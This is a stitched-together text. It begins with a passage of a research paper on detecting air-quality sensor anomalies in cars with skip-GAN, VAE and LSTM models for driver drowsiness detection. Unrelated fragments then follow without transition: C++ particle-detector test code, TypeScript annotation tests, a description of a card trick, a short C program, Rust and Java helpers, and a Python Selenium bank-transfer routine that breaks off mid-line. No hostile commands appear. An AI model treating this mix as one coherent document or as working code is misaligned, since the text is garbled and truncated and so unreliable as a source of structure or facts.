These are methods of detecting abnormal patterns within periodic data. A majority of sensor data have periodic change patterns in which similar patterns recur at regular intervals. Using a generative model, it is possible to learn the process of generating data for one cycle in the form of a probability distribution by inputting a continuously changing pattern. The skip-GAN and the VAE are representative generative models and can produce new patterns similar to the input patterns they are trained on. Both models learn common sensor data patterns in order to artificially generate sensor data with similar patterns. The data generated by the generative model are similar to the actual measured values when the sensor is in a steady state but differ when it is in an abnormal state. The difference between the pattern of changes in the measured values and the pattern produced by the generative model is quantified with an anomaly score: the greater the likelihood of an anomaly, the higher the score.
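The anomaly score described above reduces to a distance between the measured cycle and the cycle the generative model synthesizes. A hedged sketch follows: the fixed "synthetic" cycle stands in for the output of a trained skip-GAN or VAE, and mean absolute difference is an assumed choice of score:

```python
def anomaly_score(measured, synthetic):
    """Mean absolute difference between a measured cycle and the
    pattern a generative model would synthesize for a normal cycle."""
    assert len(measured) == len(synthetic)
    return sum(abs(m - s) for m, s in zip(measured, synthetic)) / len(measured)

# Stand-in for one cycle synthesized by a trained generative model
synthetic_cycle = [10, 12, 15, 12, 10]

normal_cycle   = [10, 13, 15, 11, 10]   # close to the learned pattern
abnormal_cycle = [10, 30, 45, 28, 10]   # deviates strongly mid-cycle

low  = anomaly_score(normal_cycle, synthetic_cycle)    # small score
high = anomaly_score(abnormal_cycle, synthetic_cycle)  # large score
```

The score is small when the sensor behaves normally and grows with the deviation, matching the intuition that higher scores indicate a greater likelihood of an anomaly.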
To demonstrate the significance of skip-GANs, we provide the example of Schlegl et al., who proposed an algorithm for detecting diseases from medical images using a GAN. This algorithm is composed of learning and inference stages. In the learning stage, the GAN model is trained with images of healthy subjects. In the inference stage, when a new image is input, the GAN model generates an artificial image highly similar to the input image. As the GAN is trained only with normal data, the generated artificial image is assumed to be a normal image of a subject without the disease, and the anomaly score is calculated by comparing the normal image with the input image. In another report, Xu et al. proposed an anomaly detection algorithm using a VAE to monitor indicators such as the number of users of web applications and to implement appropriate measures when abnormal events occur. In unsupervised learning methods, it is very important that the model does not overfit specific inputs and that the normal pattern is learned well. To prevent missing values from contributing to the loss function, Xu et al. injected random missing values into the input data and used a modified loss function. For a sensor under normal operation, data synthesized by the generative model are approximately equal to the measured data. When an anomaly occurs, however, the sensor measurements exhibit different patterns. Hence, the difference between the synthetic and measured patterns can be used as the anomaly score, where higher values indicate a greater likelihood of an anomaly, providing an intuitive means of inferring the system status.
Input Data Configuration
The data collection period was from August 1, 2019 to September 30, 2019. Sensors were sequentially installed in 95 vehicles from SoCar, a car sharing platform in South Korea.
The data were measured every 2 s while the customer boarded and operated the vehicle, and were sent to the SK Planet Cloud Server. Through this process, 79 million data points were collected from the sensors. Each sensor data point, collected from vehicles of various sizes, contains all the AQ parameters. During the data collection period, 95 sensors (Figure 3) were installed in the vehicles chosen for the analysis: 30 sensors in the Carnival model of large vehicles, 32 in the Avante (medium), and 33 in the Morning (small). The learning dataset was selected by referring to the PM data distribution and the ultra-PM reference value provided by the Korea Environment Corporation (KEPC). We excluded some abnormal data during preprocessing, namely those with PM2.5 > 75 µg/m³ according to the enacting environmental authority (KEPC) and those with temperatures greater than 50 °C. Data meeting these conditions were excluded from the learning dataset because of the effects of external air quality; that is, when PM2.5 < 75 µg/m³, the external air quality has no influence on the AQ parameters measured inside the vehicle.
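The exclusion rule amounts to a simple row filter during preprocessing; the field names (`pm25`, `temp_c`) and record layout below are assumptions for illustration:

```python
# Exclude samples dominated by external air: PM2.5 > 75 µg/m³ or temp > 50 °C
PM25_LIMIT = 75.0   # KEPC ultra-PM reference value
TEMP_LIMIT = 50.0

def keep_for_training(sample):
    """Keep only samples within the PM2.5 and temperature limits."""
    return sample["pm25"] <= PM25_LIMIT and sample["temp_c"] <= TEMP_LIMIT

samples = [
    {"pm25": 12.0, "temp_c": 27.0},   # kept
    {"pm25": 90.0, "temp_c": 28.0},   # dropped: external PM influence
    {"pm25": 30.0, "temp_c": 55.0},   # dropped: over-temperature
]
training_set = [s for s in samples if keep_for_training(s)]
```

Filtering before training keeps the learning dataset free of readings dominated by outside air rather than the in-vehicle environment.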
Figure 4 shows an example of the signals received from the AQS installed in the vehicle. We employed basic sensors and monitored the data in real time. The deep learning model was used to detect sensor measurements with anomalous readings and to notify the user. A function for correcting errors in the data was also included, enabling reliable data acquisition at low cost. When analyzing the air quality data collected by the sensors during a test drive, a typical anomaly case is the smoking of a cigarette in the vehicle. Therefore, when abnormal changes in PM values were recognized, the data were intensively analyzed and applied to the model from approximately 90 s after the change in PM value. The data were manually labeled using anomaly criteria, and the resulting class imbalance was addressed via random oversampling. Subsequently, the deep neural network was trained to identify normal or abnormal conditions from the sensor data. As the input data represent a time series, LSTM was set as the basic structure, and the input data were composited for improved computational speed and optimized to maximize the detection performance.
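The random oversampling used above to counter the class imbalance can be sketched as follows (the 1:1 target ratio and the seeded RNG are assumptions for illustration):

```python
import random

def oversample(majority, minority, seed=0):
    """Duplicate minority-class samples at random until the classes balance."""
    rng = random.Random(seed)
    extra = [rng.choice(minority) for _ in range(len(majority) - len(minority))]
    return majority + minority + extra

normal   = [0.1, 0.2, 0.15, 0.12, 0.18, 0.11]  # abundant normal samples
abnormal = [5.0, 4.2]                           # rare anomaly samples

balanced = oversample(normal, abnormal)
# balanced now holds 6 normal and 6 abnormal samples
```

Balancing the labels this way prevents the classifier from trivially predicting the majority (normal) class.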
Results of Deep Learning Model
We applied the DSD system to actual IoT sensor data to develop a deep learning model that could accurately determine the sensor state by learning the changes in the patterns. The VAE structure provided a smaller network capacity under the same conditions; however, the detection performance was almost identical, demonstrating the successful conversion of the DSD into a lightweight structure. The experimental results demonstrated that the anomaly detection performance of the proposed algorithm was better than that of existing techniques. To verify the anomaly detection performance of each deep learning model, the predicted values obtained from the developed models were reconstructed in a manner similar to the actual values, based on the PM2.5 of normal and abnormal data. In Figures 5-7, the blue and red lines represent the predicted and actual values, respectively. The LSTM was trained to overfit the normal data. The LSTM model had higher sensitivity to PM and was reconfigured to a low value to reconstruct the abnormal data. Thus, the model was designed to have high sensitivity to small changes in the PM data, which resulted in more detections than would be possible with the existing models (Figure 5). The VAE model was reconfigured to follow the trend of PM value changes and was sensitive at high PM values; its detection was effective at higher PM concentrations (Figure 6). The skip-GAN exhibited superior detection performance compared to the existing models at the point at which the PM value started to increase (Figure 7), and it could detect abnormalities more effectively than the other models when the air quality exhibited high PM concentrations.
Sustainability 2020, 12, x FOR PEER REVIEW 12 of 17
Conclusions
Currently, high-performance ADAS products are being developed and commercialized. This has led to a significant reduction in their prices, and the detection accuracy is constantly being improved. In line with this development, the proposed DSD system is a low-cost, basic product that can easily be installed in vehicles.
To prevent fatigue-related accidents, the system informs the driver and passengers of the CO2 levels, monitors the CO and CO2 concentrations, and predicts the drowsiness state of the driver. The DSD system measures and monitors in-vehicle air quality (through factors such as CO2 concentration) using relevant sensors. It uses the data acquired from these sensors to monitor the interior environment in real time to detect the state of the driver and to help prevent accidents. The development of an ADAS standard and products satisfying the safety needs of customers is necessary for the advancement of technologies preventing driver drowsiness. Furthermore, data regarding the psychophysiological changes of drivers that affect long-term driving can be used to draft policies for road accident prevention, after the commercialization of this technology. The various behavioral factors influencing driving identified by the proposed system can be used to devise specific services and human-computer interface principles to enhance future autonomous vehicles. These developments will help OEMs prioritize marketing decisions for selecting key services and ADAS functionality. We developed a DSD system based on a deep neural network and IoT-enabled in-vehicle AQS to prevent or minimize the risk of accidents related to driver drowsiness or sleep deprivation. We also analyzed the development trends of technology for facilitating DSD in the context of ADASs. The application of driver drowsiness prevention devices in various fields was studied. It was found that their adoption is limited by issues such as high cost and low detection accuracy. We manufactured a low-cost sensor with basic specifications, integrated it with a deep learning model, and proved its greater effectiveness in detecting abnormalities in the interior environment of a vehicle, as compared to existing methods. 
Managerial Implications
Korea is enacting and implementing "Environmental Air Quality Management Standards for Newly Made Vehicles," which has the objective of minimizing the damage caused to drivers and passengers due to harmful compounds generated by the interior materials of new cars. Related organizations and automobile companies are undertaking significant measures to optimize the selection of materials used for the interior parts of automobiles and to analyze harmful compounds. For example, AQSs improve the performance of existing air conditioning filters and involve the application of a new type of air purifier. They use new electronic sensors to detect harmful gases, especially NOx and CO, as well as PM, and provide an effective means of eliminating odors and reducing the influx of PM in vehicles through air cleaning functions when driving in polluted regions, such as urban areas or tunnels where traffic is abundant.
Eco-friendliness factors, such as the air quality inside vehicles, are recognized as important purchase conditions for consumers because of the increased amount of time spent by drivers and passengers inside vehicles and their interest in health.
Practical and Social Implications
To prevent driver drowsiness, the proposed system predicts physical conditions such as driver fatigue and inattention and provides appropriate voice alerts on the smartphone of the driver. If slight drowsiness is detected, simple actions such as activating the air conditioner are automatically performed. As the drowsiness of the driver increases, the system actively prompts the driver to perform functions for safe driving. Depending on the level of drowsiness, the driver will perform the appropriate course of action, such as using a smartphone GPS to locate a place, lowering the windows of the vehicle for ventilation, using a nearby resting area, or calling a family member. When the driver responds appropriately and returns to a stable condition, the service will terminate. Thus, it helps prevent accidents and save lives. The proposed service concept will be applied to the smartphone navigation T map in the future. T map is the primary navigation service brand used in Korea. Predicting the CO 2 concentration and fatigue level at the appropriate time for drivers using T map enables the system to recommend that the driver take a break at a highway rest area through voice guidance or to rest at a drowsy driving shelter. In addition to performing active safety functions, the proposed system utilizes services connected to management systems for in-vehicle air quality management and road rest areas corresponding to the driving route and time. The prototype does not consider excess alerts. In the future, we plan to develop a location-based service by utilizing the abnormal and normal detection functions of the system.
We will employ human-computer interaction technology to prevent abnormal alarms that may distract drivers. Moreover, when the fatigue of a driver reaches a certain threshold, the system turns on a warning indicator for mandatory rest and warns the driver about the possibility of an accident. DSD systems are offered as premium options in some luxury cars; hence, they are not accessible to everyone. Our product can improve the performance of AQSs using deep learning, and it is also affordable. In the future, this system will be expanded to develop a comprehensive driver safety system that combines emergency warnings and actions, as well as drowsiness, head pose, and gaze tracking.
Limitations
Present studies on driver drowsiness prevention are conducted in controlled environments to produce the best results under ideal conditions. Consequently, they are not reliable for all practical situations. To compensate for this limitation, we tested the proposed DSD system using actual vehicles rather than simulators. However, various factors that affect in-vehicle air quality while driving were not considered in this study. The driving environment changes in real time and is affected by the weather, which requires special consideration. Moreover, driving datasets are still insufficient for verifying model fitness, especially in metropolitan areas. In future works, model accuracy should be further investigated, and the sensor data accumulated from various driving situations should be considered. In addition, the generalization of anomaly detection performance should be verified. The anomaly detection model should be further upgraded for the five types of sensors by combining it with other data. It is necessary to gauge air quality using multiple models to account for the complexity of variables for describing the interior of a vehicle. Existing models should be advanced and optimized by considering the factors that affect air quality data, such as driving history.
For this purpose, it is necessary to refine machine learning models for optimal anomaly detection according to the updated specifications of the sensors, through further investigation. Several practical situations can be identified and predicted by considering more diverse data, such as vehicle mileage and driving time, using AI-based analysis and by relating this information to the vehicle driving environment.
#include "CalibFormats/SiStripObjects/test/plugins/testSiStripHashedDetId.h" #include "CalibFormats/SiStripObjects/interface/SiStripHashedDetId.h" #include "DataFormats/SiStripCommon/interface/SiStripConstants.h" #include "FWCore/Framework/interface/Event.h" #include "FWCore/Framework/interface/ESHandle.h" #include "FWCore/MessageLogger/interface/MessageLogger.h" #include "Geometry/TrackerGeometryBuilder/interface/TrackerGeometry.h" #include "Geometry/Records/interface/TrackerDigiGeometryRecord.h" #include "Geometry/CommonDetUnit/interface/GeomDet.h" #include "Geometry/CommonDetUnit/interface/GeomDetType.h" #include "Geometry/CommonTopologies/interface/StripTopology.h" #include "Geometry/TrackerGeometryBuilder/interface/StripGeomDetUnit.h" #include "Geometry/TrackerGeometryBuilder/interface/StripGeomDetType.h" #include <boost/cstdint.hpp> #include <algorithm> #include <iostream> #include <sstream> #include <vector> #include <time.h> using namespace sistrip; // ----------------------------------------------------------------------------- // testSiStripHashedDetId::testSiStripHashedDetId( const edm::ParameterSet& pset ) { edm::LogVerbatim(mlDqmCommon_) << "[testSiStripHashedDetId::" << __func__ << "]" << " Constructing object..."; } // ----------------------------------------------------------------------------- // testSiStripHashedDetId::~testSiStripHashedDetId() { edm::LogVerbatim(mlDqmCommon_) << "[testSiStripHashedDetId::" << __func__ << "]" << " Destructing object..."; } // ----------------------------------------------------------------------------- // void testSiStripHashedDetId::initialize( const edm::EventSetup& setup ) { edm::LogVerbatim(mlDqmCommon_) << "[SiStripHashedDetId::" << __func__ << "]" << " Tests the generation of DetId hash map..."; // Retrieve geometry edm::ESHandle<TrackerGeometry> geom; setup.get<TrackerDigiGeometryRecord>().get( geom ); // Build list of DetIds std::vector<uint32_t> dets; dets.reserve(16000); 
TrackerGeometry::DetContainer::const_iterator iter = geom->detUnits().begin(); for( ; iter != geom->detUnits().end(); ++iter ) { const auto strip = dynamic_cast<const StripGeomDetUnit*>(*iter); if( strip ) { dets.push_back( (strip->geographicalId()).rawId() ); } } edm::LogVerbatim(mlDqmCommon_) << "[testSiStripHashedDetId::" << __func__ << "]" << " Retrieved " << dets.size() << " strip DetIds from geometry!"; // Sorted DetId list gives max performance, anything else is worse if ( true ) { std::sort( dets.begin(), dets.end() ); } else { std::reverse( dets.begin(), dets.end() ); } // Manipulate DetId list if ( false ) { if ( dets.size() > 4 ) { uint32_t temp = dets.front(); dets.front() = dets.back(); // swapped dets.back() = temp; // swapped dets.at(1) = 0x00000001; // wrong dets.at(dets.size()-2) = 0xFFFFFFFF; // wrong } } // Create hash map SiStripHashedDetId hash( dets ); LogTrace(mlDqmCommon_) << "[testSiStripHashedDetId::" << __func__ << "]" << " DetId hash map: " << std::endl << hash; // Manipulate DetId list if ( false ) { if ( dets.size() > 4 ) { uint32_t temp = dets.front(); dets.front() = dets.back(); // swapped dets.back() = temp; // swapped dets.at(1) = 0x00000001; // wrong dets.at(dets.size()-2) = 0xFFFFFFFF; // wrong } } // Retrieve hashed indices std::vector<uint32_t> hashes; uint32_t istart = time(NULL); for( uint16_t tt = 0; tt < 10000; ++tt ) { // 10000 loops just to see some non-negligible time meaasurement! 
hashes.clear(); hashes.reserve(dets.size()); std::vector<uint32_t>::const_iterator idet = dets.begin(); for( ; idet != dets.end(); ++idet ) { hashes.push_back( hash.hashedIndex(*idet) ); } } // Some debug std::stringstream ss; ss << "[testSiStripHashedDetId::" << __func__ << "]"; std::vector<uint32_t>::const_iterator ii = hashes.begin(); uint16_t cntr1 = 0; for( ; ii != hashes.end(); ++ii ) { if ( *ii == sistrip::invalid32_ ) { cntr1++; ss << std::endl << " Invalid index " << *ii; continue; } uint32_t detid = hash.unhashIndex(*ii); std::vector<uint32_t>::const_iterator iter = find( dets.begin(), dets.end(), detid ); if ( iter == dets.end() ) { cntr1++; ss << std::endl << " Did not find value " << detid << " at index " << ii-hashes.begin() << " in vector!"; } else if ( *ii != static_cast<uint32_t>(iter-dets.begin()) ) { cntr1++; ss << std::endl << " Found same value " << detid << " at different indices " << *ii << " and " << iter-dets.begin(); } } if ( cntr1 ) { ss << std::endl << " Found " << cntr1 << " incompatible values!"; } else { ss << " Found no incompatible values!"; } LogTrace(mlDqmCommon_) << ss.str(); edm::LogVerbatim(mlDqmCommon_) << "[testSiStripHashedDetId::" << __func__ << "]" << " Processed " << hashes.size() << " DetIds in " << (time(NULL)-istart) << " seconds"; // Retrieve DetIds std::vector<uint32_t> detids; uint32_t jstart = time(NULL); for( uint16_t ttt = 0; ttt < 10000; ++ttt ) { // 10000 loops just to see some non-negligible time measurement! 
detids.clear(); detids.reserve(dets.size()); for( uint16_t idet = 0; idet < dets.size(); ++idet ) { detids.push_back( hash.unhashIndex(idet) ); } } // Some debug std::stringstream sss; sss << "[testSiStripHashedDetId::" << __func__ << "]"; uint16_t cntr2 = 0; std::vector<uint32_t>::const_iterator iii = detids.begin(); for( ; iii != detids.end(); ++iii ) { if ( *iii != dets.at(iii-detids.begin()) ) { cntr2++; sss << std::endl << " Diff values " << *iii << " and " << dets.at(iii-detids.begin()) << " found at index " << iii-detids.begin() << " "; } } if ( cntr2 ) { sss << std::endl << " Found " << cntr2 << " incompatible values!"; } else { sss << " Found no incompatible values!"; } LogTrace(mlDqmCommon_) << sss.str(); edm::LogVerbatim(mlDqmCommon_) << "[testSiStripHashedDetId::" << __func__ << "]" << " Processed " << detids.size() << " hashed indices in " << (time(NULL)-jstart) << " seconds"; } // ----------------------------------------------------------------------------- // void testSiStripHashedDetId::analyze( const edm::Event& event, const edm::EventSetup& setup ) { initialize(setup); LogTrace(mlDqmCommon_) << "[testSiStripHashedDetId::" << __func__ << "]" << " Analyzing run/event " << event.id().run() << "/" << event.id().event(); }
import { annotationModule } from '../../modules/annotation'; import { annotationLinkHandler } from './annotationLinkHandler'; describe('annotationLinker', () => { describe('countLinkedEntities', () => { it('should return the linked entities count', () => { const annotations = [ { category: 'firstName', text: 'Nicolas' }, { category: 'firstName', text: 'Nicolas' }, { category: 'firstName', text: 'nicolas' }, { category: 'firstName', text: 'Romain' }, { category: 'firstName', text: 'Romain' }, { category: 'firstName', text: 'romain' }, { category: 'firstName', text: 'Romain' }, { category: 'firstName', text: 'Benoit' }, ].map(annotationModule.generator.generate); const linkedAnnotations = annotationLinkHandler.link( annotations[0], annotations[2], annotationLinkHandler.link(annotations[3], annotations[5], annotations), ); const linkedEntitiesCount = annotationLinkHandler.countLinkedEntities(linkedAnnotations); expect(linkedEntitiesCount).toEqual(2); }); }); describe('getLinkableAnnotations', () => { it('should return all the linkable annotations to the given annotation', () => { const category = 'CATEGORY'; const annotations = [ { category: category }, { category: category, text: 'Z' }, { category: category, text: 'A' }, { category: category, text: 'A' }, { category: 'ANOTHER_CATEGORY' }, ].map(annotationModule.generator.generate); const linkableAnnotations = annotationLinkHandler.getLinkableAnnotations(annotations[0], annotations); expect(linkableAnnotations).toEqual([annotations[2], annotations[1]]); }); }); describe('getLinkedAnnotations', () => { it('should return all the linked annotations to the given annotation', () => { const category = 'CATEGORY'; const annotations = [ { category: category, text: 'TEXT1' }, { category: category, text: 'TEXT2' }, { category: category, text: 'TEXT3' }, { category: category, text: 'TEXT3' }, { category: 'ANOTHER_CATEGORY' }, ].map(annotationModule.generator.generate); const annotationsWithLinks1 = 
annotationLinkHandler.link(annotations[0], annotations[2], annotations); const annotationsWithLinks2 = annotationLinkHandler.link( annotationsWithLinks1[0], annotationsWithLinks1[1], annotationsWithLinks1, ); const annotationsWithLinks3 = annotationLinkHandler.link( annotationsWithLinks2[0], annotationsWithLinks2[2], annotationsWithLinks2, ); const linkedAnnotations = annotationLinkHandler.getLinkedAnnotations( annotationsWithLinks3[0].entityId, annotationsWithLinks3, ); expect(linkedAnnotations).toEqual([ annotationsWithLinks3[0], annotationsWithLinks3[1], annotationsWithLinks3[2], annotationsWithLinks3[3], ]); }); }); describe('getLinkedAnnotationRepresentatives', () => { it('should return all the linked annotation representatives to the given annotation', () => { const category = 'CATEGORY'; const annotations = [ { category: category, text: 'TEXT1' }, { category: category, text: 'TEXT2' }, { category: category, text: 'TEXT3' }, { category: category, text: 'TEXT3' }, { category: 'ANOTHER_CATEGORY' }, ].map(annotationModule.generator.generate); const annotationsWithLinks1 = annotationLinkHandler.link(annotations[0], annotations[2], annotations); const annotationsWithLinks2 = annotationLinkHandler.link( annotationsWithLinks1[0], annotationsWithLinks1[1], annotationsWithLinks1, ); const annotationsWithLinks3 = annotationLinkHandler.link( annotationsWithLinks2[0], annotationsWithLinks2[2], annotationsWithLinks2, ); const linkedAnnotations = annotationLinkHandler.getLinkedAnnotationRepresentatives( annotationsWithLinks3[0].entityId, annotationsWithLinks3, ); expect(linkedAnnotations).toEqual([annotationsWithLinks3[0], annotationsWithLinks3[1], annotationsWithLinks3[2]]); }); }); describe('getRepresentatives', () => { it('should return all the representatives of the given annotations', () => { const category = 'CATEGORY'; const annotations = [ { category: category, text: 'B' }, { category: category, text: 'Z' }, { category: category, text: 'A' }, { category: category, 
text: 'A' }, { category: 'ANOTHER_CATEGORY', text: 'A' }, ].map(annotationModule.generator.generate); const representatives = annotationLinkHandler.getRepresentatives(annotations); expect(representatives).toEqual([annotations[2], annotations[4], annotations[0], annotations[1]]); }); }); describe('isLinked', () => { it('should return true if the annotation is linked to another one', () => { const category = 'CATEGORY'; const annotations = [{ category: category }, { category: category }].map(annotationModule.generator.generate); const annotationsWithLinks = annotationLinkHandler.link(annotations[0], annotations[1], annotations); const annotationIsLinked = annotationLinkHandler.isLinked(annotationsWithLinks[0], annotationsWithLinks); expect(annotationIsLinked).toEqual(true); }); }); describe('link', () => { it('should link the annotations of the category/text source to the annotations of the category/text target', () => { const category = 'CATEGORY'; const textSource = 'SOURCE'; const textTarget = 'TARGET'; const annotations = [ { category: category, text: textSource }, { category: category, text: textSource }, { category: category, text: textTarget }, {}, ].map(annotationModule.generator.generate); const entityIdOfTextTarget = annotations[2].entityId; const newAnnotations = annotationLinkHandler.link(annotations[0], annotations[2], annotations); expect(newAnnotations).toEqual([ { ...annotations[0], entityId: entityIdOfTextTarget }, { ...annotations[1], entityId: entityIdOfTextTarget }, { ...annotations[2], entityId: entityIdOfTextTarget }, annotations[3], ]); }); it('should work with forward links', () => { const category = 'CATEGORY'; const text1 = '1'; const text2 = '2'; const text3 = '3'; const annotations = [ { category: category, text: text1 }, { category: category, text: text2 }, { category: category, text: text3 }, ].map(annotationModule.generator.generate); const entityIdOfText3 = annotations[2].entityId; const annotationsWithLinks = 
annotationLinkHandler.link(annotations[0], annotations[1], annotations); const newAnnotations = annotationLinkHandler.link( annotationsWithLinks[1], annotationsWithLinks[2], annotationsWithLinks, ); expect(newAnnotations).toEqual([ { ...annotations[0], entityId: entityIdOfText3 }, { ...annotations[1], entityId: entityIdOfText3 }, { ...annotations[2], entityId: entityIdOfText3 }, ]); }); it('should work with backward links ', () => { const category = 'CATEGORY'; const text1 = '1'; const text2 = '2'; const text3 = '3'; const annotations = [ { category: category, text: text1 }, { category: category, text: text2 }, { category: category, text: text3 }, ].map(annotationModule.generator.generate); const entityIdOfText3 = annotations[2].entityId; const annotationsWithLinks = annotationLinkHandler.link(annotations[1], annotations[2], annotations); const newAnnotations = annotationLinkHandler.link( annotationsWithLinks[0], annotationsWithLinks[1], annotationsWithLinks, ); expect(newAnnotations).toEqual([ { ...annotations[0], entityId: entityIdOfText3 }, { ...annotations[1], entityId: entityIdOfText3 }, { ...annotations[2], entityId: entityIdOfText3 }, ]); }); }); describe('unlink', () => { it('should unlink the given annotation (source of a link)', () => { const category = 'CATEGORY'; const textSource = 'SOURCE'; const textTarget = 'TARGET'; const annotations = [ { category: category, text: textSource }, { category: category, text: textSource }, { category: category, text: textTarget }, {}, ].map(annotationModule.generator.generate); const annotationsWithLinks = annotationLinkHandler.link(annotations[0], annotations[2], annotations); const newAnnotations = annotationLinkHandler.unlink(annotationsWithLinks[0], annotationsWithLinks); expect(newAnnotations).toEqual(annotations); }); it('should unlink the given annotation (target of a link)', () => { const category = 'CATEGORY'; const textSource = 'SOURCE'; const textTarget = 'TARGET'; const annotations = [ { category: category, 
text: textSource }, { category: category, text: textSource }, { category: category, text: textTarget }, {}, ].map(annotationModule.generator.generate); const annotationsWithLinks = annotationLinkHandler.link(annotations[0], annotations[2], annotations); const newAnnotations = annotationLinkHandler.unlink(annotationsWithLinks[2], annotationsWithLinks); expect(newAnnotations).toEqual(annotations); }); }); describe('unlinkByCategoryAndText', () => { it('should unlink only the given annotation (source of a link)', () => { const category = 'CATEGORY'; const textSource = 'SOURCE'; const textTarget1 = 'TARGET1'; const textTarget2 = 'TARGET2'; const annotations = [ { category: category, text: textSource }, { category: category, text: textSource }, { category: category, text: textTarget1 }, { category: category, text: textTarget2 }, ].map(annotationModule.generator.generate); const annotationsWithLinks1 = annotationLinkHandler.link(annotations[0], annotations[3], annotations); const annotationsWithLinks2 = annotationLinkHandler.link( annotationsWithLinks1[0], annotationsWithLinks1[2], annotationsWithLinks1, ); const newAnnotations = annotationLinkHandler.unlinkByCategoryAndText( annotationsWithLinks2[0], annotationsWithLinks2, ); expect(newAnnotations[0]).toEqual(annotations[0]); expect(newAnnotations[1]).toEqual(annotations[1]); expect(annotationLinkHandler.isLinkedTo(newAnnotations[2], newAnnotations[3])).toEqual(true); }); it('should unlink the given annotation (target of a link)', () => { const category = 'CATEGORY'; const textSource = 'SOURCE'; const textTarget1 = 'TARGET1'; const textTarget2 = 'TARGET2'; const annotations = [ { category: category, text: textSource }, { category: category, text: textSource }, { category: category, text: textTarget1 }, { category: category, text: textTarget2 }, ].map(annotationModule.generator.generate); const annotationsWithLinks1 = annotationLinkHandler.link(annotations[0], annotations[3], annotations); const annotationsWithLinks2 = 
annotationLinkHandler.link( annotationsWithLinks1[0], annotationsWithLinks1[2], annotationsWithLinks1, ); const newAnnotations = annotationLinkHandler.unlinkByCategoryAndText( annotationsWithLinks2[3], annotationsWithLinks2, ); expect(newAnnotations[3]).toEqual(annotations[3]); expect(annotationLinkHandler.isLinkedTo(newAnnotations[0], newAnnotations[2])).toEqual(true); }); }); });
The Order of the k-Letter Spelling Shuffle A mathemagician gives a deck of cards to an audience member and asks her to shuffle it thoroughly. The spectator is then asked to name her favorite mathematician (suppose "Paul Erdős" is chosen) and to cut off roughly the top quarter of the deck. The mathemagician takes both stacks back (we are done with the larger stack) and demonstrates a spelling deal on the smaller deck. That is, he spells out PAUL ERDOS one letter at a time, and for each letter he places the top card of the quarter deck onto the table into a growing stack; he then drops the remaining cards of the quarter deck on top of the dealt stack. In essence, this takes the top nine cards, reverses their order, and moves them to the bottom of the deck. Then, "to make sure the deck is thoroughly messed up," the quarter deck is handed back to the audience member, who performs the same spelling deal twice more. The mathemagician then claims to be able to sense what the top card of the deck is. After he announces his guess, the audience member dramatically holds up the top card, confirming the guess to thunderous applause. There are two small dynamic elements to this trick that are easy to miss. First, a quarter of the deck was asked for. If the chosen mathematician has a name with k letters, then we need to ensure that the deck has between k and 2k cards in it. With a nine-letter name like Paul Erdős, a quarter of the deck works well. If Srinivasa Ramanujan (eighteen letters) is selected, then spell carefully and ask for half the deck. Second, when the mathemagician takes the two stacks back from the spectator, he inconspicuously glances at the card on the bottom of the small stack; this is the card that will wind up on top, due to the following principle.
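The principle can be checked with a short simulation (a sketch; the function names are my own, not from the source). One spelling deal on a deck of n cards with a k-letter name reverses the top k cards and moves them to the bottom; whenever k ≤ n ≤ 2k, three such deals bring the original bottom card to the top.

```python
def spelling_deal(deck, k):
    """One spelling deal: reverse the top k cards and move them to the bottom.

    deck[0] is the top of the deck.
    """
    return deck[k:] + deck[:k][::-1]


def top_after_three_deals(n, k):
    """Return the card on top after three k-letter spelling deals on n cards."""
    deck = list(range(n))  # card n-1 starts on the bottom
    for _ in range(3):
        deck = spelling_deal(deck, k)
    return deck[0]


# With a nine-letter name, every deck size n with 9 <= n <= 18 works:
# the card that started on the bottom (n-1) ends on top.
k = 9  # "PAUL ERDOS"
for n in range(k, 2 * k + 1):
    assert top_after_three_deals(n, k) == n - 1
```

In particular, a quarter of a standard deck (13 cards) falls in the range [9, 18], which is why the quarter cut makes the nine-letter deal come out right.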
#include <stdio.h> #include <stdlib.h> int main() { int a[5][5],i,j,p=2,c=0,i1,j1; for(i=0;i<5;i++) {for(j=0;j<5;j++) { scanf("%d",&a[i][j]); } printf("\n"); } for(i1=0;i1<5;i1++) {for(j1=0;j1<5;j1++) { if(a[i1][j1]!=0) {i=i1; j=j1;} }} while(i!=2||j!=2) { if(i<p&&j<p) { i++; j++; c=c+2; } else if(i<p&&j>p) { i++; j--; c=c+2; } else if (i>p&&j<p) { i--; j++; c=c+2; } else if (i>p&&j>p) { i--; j--; c=c+2; } else if(i<p&&j==p) { i++; c=c+1; } else if(i>p&&j==p) { i--; c=c+1; } else if(i==p&&j<p) { j++; c=c+1; } else if(i==p&&j>p) { j--; c=c+1; } } printf("%d",c); return 0;}
/// Returns `Some` with a vector of owned strings. Accepts either a single
/// string value or a list of strings under the given key.
pub fn as_strings(yaml: &Yaml, key: &str) -> Option<Vec<String>> {
    let yaml = &yaml[key];
    if let Some(val) = yaml.as_str() {
        Some(vec![val.to_string()])
    } else if let Some(vals) = yaml.as_vec() {
        let strings = vals.iter().filter_map(|x| x.as_str().map(|x| x.to_owned())).collect();
        Some(strings)
    } else {
        None
    }
}
/** * Reads the given object into a JsonNode while using the JsonForIO view. */ private JsonNode asObjectNodeWithIOView(Object obj) throws IOException { String tmpStr = Json.mapper().writerWithView(JsonForIO.class) .writeValueAsString(obj); return Json.mapper().readTree(tmpStr); }
def do_transfer(self, data): ok = False name = data['odbiorca'] LOG.info(u"Wybieranie rachunku '{0}' z książki adresowej.".format(name)) try: self.wait_for_clickable_element(self.LOCATOR_BOOKMARKS).click() self.wait_for_clickable_element(self.LOCATOR_RECORDS_LIST) records = self.driver.find_elements(By.XPATH, self.LOCATOR_RECORDS) for record in records: if unicode(record.text) == name: LOG.info(u"Odnaleziono odbiorcę '{0}' w książce adresowej.".format(name)) self.driver.execute_script("arguments[0].scrollIntoView(true);", record) record.click() LOG.info(u"Ładowanie formularza.") web_el = self.wait_for_clickable_element(self.LOCATOR_TRANSFER_DO, By.ID) self.js_click(web_el) LOG.info(u"Wypełnianie danych.") web_el = self.wait_for_clickable_element(self.LOCATOR_TRANSFER_AMOUNT, By.ID) web_el.clear() web_el.send_keys(str(data['kwota'])) web_el = self.driver.find_element_by_id(self.LOCATOR_TRANSFER_TITLE) web_el.clear() web_el.send_keys(data[u'tytuł']) LOG.info(u"Zatwierdzanie tranzakcji.") self.driver.find_element_by_xpath(self.LOCATOR_TRANSFER_SUBMIT).click() sms = data.get('sms') if sms is not None and not sms: self.wait_for_clickable_element(self.LOCATOR_TRANSFER_SEND).click() else: sms = True self.check_transfer_confirmation(data[u'kwota'], sms) LOG.debug(u"Wykonywanie zrzutu ekranu poprawnie wykonanego przelewu.") self.driver.save_screenshot(OK_SHOT) return True LOG.error(u"Nie odnaleziono rachunku '{0}' w książce 